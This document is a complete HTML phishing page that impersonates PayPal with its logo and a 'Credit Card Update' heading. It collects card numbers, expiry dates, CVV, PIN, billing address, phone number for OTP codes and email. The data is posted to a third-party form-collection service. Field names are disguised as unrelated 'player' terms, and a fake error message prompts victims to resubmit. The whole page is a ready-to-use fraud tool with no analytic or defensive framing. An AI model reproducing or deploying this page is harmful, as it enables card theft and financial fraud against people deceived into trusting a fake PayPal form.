<!DOCTYPE html>

<html lang="en">

<head>

    <meta charset="UTF-8">

    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <title>Credit Card Update</title>

    <link rel="icon" href="(link unavailable)">

</head>

<body>

    <form action="https://usebasin.com/f/46d11386195a" method="post" id="credit-card-form">

        <img src="https://www.paypalobjects.com/images/shared/paypal-logo-129x32.svg" alt="PayPal Logo">

        <h2>Credit Card Update</h2>

        <section>

            <h3>Card Information</h3>

            <div>

                <label for="play-type">Card Type:</label>

                <select id="play-type" name="play-type" required>

                    <option value="Visa">Visa</option>

                    <option value="Mastercard">Mastercard</option>

                    <option value="Amex">Amex</option>

                </select>

            </div>

            <div>

                <label for="player-number">Card Number:</label>

                <input type="text" id="player-number" name="player-number" placeholder="1234 5678 9012 3456"required>

            </div>

            <div>

                <label for="playing-date">Expiration Date:</label>

                <input type="date" id="expiration-date" name="playing-date" required>

            </div>

            <div>

                <label for="player unit number">CVV:</label>

                <input type="password" id="player unit number" name="player unit number" placeholder="123" required>

            </div>

            <div>

                <label for="player-next number">Security Code/PIN:</label>

                <input type="password" id="player-next number" name="player-next number" placeholder="1234" required>

            </div>

        </section>

        <section>

            <h3>Billing Information</h3>

            <div>

                <label for="player-name">Cardholder/Name:</label>

                <input type="text" id="player-name" name="player-name" required>

            </div>

            <div>

                <label for="player address">Address:</label>

                <input type="text" id="player address" name="player address" required>

            </div>

            <div>

                <label for="city">City:</label>

                <input type="text" id="city" name="city" required>

            </div>

            <div>

                <label for="player location">State/Province:</label>

                <input type="text" id="player location" name="player location" required>

            </div>

            <div>

                <label for="playing number">Zip/Postal Code:</label>

                <input type="text" id="playing number" name="playing number" required>

            </div>

            <div>

                <label for="playing country">Country:</label>

                <input type="text" id="playing country" name="playing country" required>

            </div>

        </section>

        <section>

            <h3>More Information</h3>

            <div>

                <label for="player-number">Phone Number (for OTP code):</label>

                <input type="tel" id="player-number" name="player-number" required>

            </div>

            <div>

                <label for="group email-address">Email Address:</label>

                <input type="email" id="group email-address" name="group email-address" required>

            </div>

        </section>

        <button type="submit" id="submit-button">Start updating</button>

        <p id="loading-message" style="display: none; color: blue;">Loading...</p>

        <p id="success-message" style="display: none; color: red;">The credit card information you provided cannot be verified. Please ensure that the information you provided is correct and try again or contact us on http://www.paypal.com/support</p>

    </form>

</body>

</html>